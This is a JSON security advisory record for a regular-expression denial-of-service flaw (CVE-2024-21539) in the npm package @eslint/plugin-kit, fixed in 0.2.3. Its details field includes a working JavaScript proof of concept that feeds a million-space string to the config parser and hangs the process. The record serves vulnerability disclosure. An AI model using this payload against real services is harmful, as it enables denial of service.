{"id":"GHSA-7q7g-4xm8-89cq","summary":"Regular Expression Denial of Service (ReDoS) in @eslint/plugin-kit","details":"Crafting a very large and well crafted string can increase the CPU usage and crash the program.\n\n## POC\n\n```js\nconst { ConfigCommentParser } = require(\"@eslint/plugin-kit\");\n\nvar str = \"\";\nfor (var i = 0; i \u003c 1000000; i++) {\n  str += \" \";\n}\nstr += \"A\";\n\nconsole.log(\"start\")\nvar parser = new ConfigCommentParser();\nconsole.log(parser.parseStringConfig(str, \"\"));\nconsole.log(\"end\")\n\n// run `npm i @eslint/plugin-kit` and `node attack.js` \n// then the program will stuck forever with high CPU usage\n```","aliases":["CVE-2024-21539"],"modified":"2026-07-17T21:10:18.366032726Z","published":"2024-11-15T20:47:31Z","database_specific":{"cwe_ids":["CWE-1333","CWE-770"],"severity":"LOW","github_reviewed":true,"github_reviewed_at":"2024-11-15T20:47:31Z","nvd_published_at":"2024-11-19T05:15:16Z"},"references":[{"type":"WEB","url":"https://github.com/eslint/rewrite/security/advisories/GHSA-7q7g-4xm8-89cq"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2024-21539"},{"type":"WEB","url":"https://github.com/eslint/rewrite/commit/071be842f0bd58de4863cdf2ab86d60f49912abf"},{"type":"PACKAGE","url":"https://github.com/eslint/rewrite"},{"type":"WEB","url":"https://security.snyk.io/vuln/SNYK-JS-ESLINTPLUGINKIT-8340627"}],"affected":[{"package":{"name":"@eslint/plugin-kit","ecosystem":"npm","purl":"pkg:npm/%40eslint/plugin-kit"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"0.2.3"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/11/GHSA-7q7g-4xm8-89cq/GHSA-7q7g-4xm8-89cq.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:L"}]}